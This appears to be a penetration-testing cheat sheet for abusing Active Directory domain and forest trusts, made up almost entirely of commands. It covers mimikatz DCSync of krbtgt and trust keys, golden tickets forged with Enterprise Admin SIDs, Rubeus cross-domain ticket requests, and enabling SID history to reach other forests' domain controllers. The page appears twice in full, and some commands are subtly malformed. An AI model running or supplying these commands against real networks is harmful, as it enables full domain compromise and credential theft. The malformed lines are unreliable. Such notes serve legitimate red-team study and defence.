Active Directory Forest

Bidirectional Trust Within a Forest

mimikatz.exe

lsadump::dcsync /domain:ops.comply.com /user:ops\krbtgt

Get-DomainSID -Domain ops.red.com

Get-DomainSID -Domain red.com

mimikatz.exe "kerberos::golden /user:Administrator /domain:ops.red.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt" "exit"

Abuse Trust key in bidirectional trust

lsadump::dcsync /domain:child.red.com /user:red$

mimikatz kerberos::golden /user:Administrator /domain:child.red.com /sid:S-1-5-21-1675743924-53933031-1918224021 /rc4:51d5b5713a4732047319d02bb9c07c10 /sids:S-1-5-21-3192643952-2658629199-322554960-519 /service:krbtgt /target:red.com /ticket:trust.kirbi

rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/reddc.red.com /dc:reddc.red.com /ptt

ls \\reddc.red.com\c$

Inbound Trust

dcsync red.com red\administrator

rubeus.exe asktgt /user:administrator /domain:red.com/aes256:b3d86eabd4895b6cc1ba459490445e0444053c7f24e0ed50cf86d1e1154576c9 /opsec /nowrap

rubeus.exe asktgs /service:krbtgt/blue.com /domain:red.com /dc:reddc.red/com /ticket:[ticket] /nowrap

rubeus.exe asktgs /service:cifs/bluedc.blue.com/domain:bluedc.blue.com /dc:bluedc.blue.com /ticket:[ticket]  /nowrap

echo '[ticket]' | grep base64 -d > red.kirbi

ls \\bluedc.blue.com\c$

Bidirectional Trust Between Forests

mimikatz.exe

lsadump::dcsync /domain:red.com /user:RED\krbtgt

Get-DomainSID -Domain red.com

Get-DomainSID -Domain redteam.com

netdom trust redteam.com /d:red.com /enablesidhistory:yes

Get-DomainGroupMember -Identity "Administrators" -Domain redteam.com

mimikatz.exe "kerberos::golden /user:Administrator /domain:redteam.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-1106 /ptt" "exit"

PreviousDomain Reconnaissance on Windows

Last updated 1 year ago

Active Directory Forest

Bidirectional Trust Within a Forest

mimikatz.exe

lsadump::dcsync /domain:ops.comply.com /user:ops\krbtgt

Get-DomainSID -Domain ops.red.com

Get-DomainSID -Domain red.com

mimikatz.exe "kerberos::golden /user:Administrator /domain:ops.red.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt" "exit"

Abuse Trust key in bidirectional trust

lsadump::dcsync /domain:child.red.com /user:red$

mimikatz kerberos::golden /user:Administrator /domain:child.red.com /sid:S-1-5-21-1675743924-53933031-1918224021 /rc4:51d5b5713a4732047319d02bb9c07c10 /sids:S-1-5-21-3192643952-2658629199-322554960-519 /service:krbtgt /target:red.com /ticket:trust.kirbi

rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/reddc.red.com /dc:reddc.red.com /ptt

ls \\reddc.red.com\c$

Inbound Trust

dcsync red.com red\administrator

rubeus.exe asktgt /user:administrator /domain:red.com/aes256:b3d86eabd4895b6cc1ba459490445e0444053c7f24e0ed50cf86d1e1154576c9 /opsec /nowrap

rubeus.exe asktgs /service:krbtgt/blue.com /domain:red.com /dc:reddc.red/com /ticket:[ticket] /nowrap

rubeus.exe asktgs /service:cifs/bluedc.blue.com/domain:bluedc.blue.com /dc:bluedc.blue.com /ticket:[ticket]  /nowrap

echo '[ticket]' | grep base64 -d > red.kirbi

ls \\bluedc.blue.com\c$

Bidirectional Trust Between Forests

mimikatz.exe

lsadump::dcsync /domain:red.com /user:RED\krbtgt

Get-DomainSID -Domain red.com

Get-DomainSID -Domain redteam.com

netdom trust redteam.com /d:red.com /enablesidhistory:yes

Get-DomainGroupMember -Identity "Administrators" -Domain redteam.com

mimikatz.exe "kerberos::golden /user:Administrator /domain:redteam.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-1106 /ptt" "exit"

PreviousDomain Reconnaissance on Windows

Last updated 1 year ago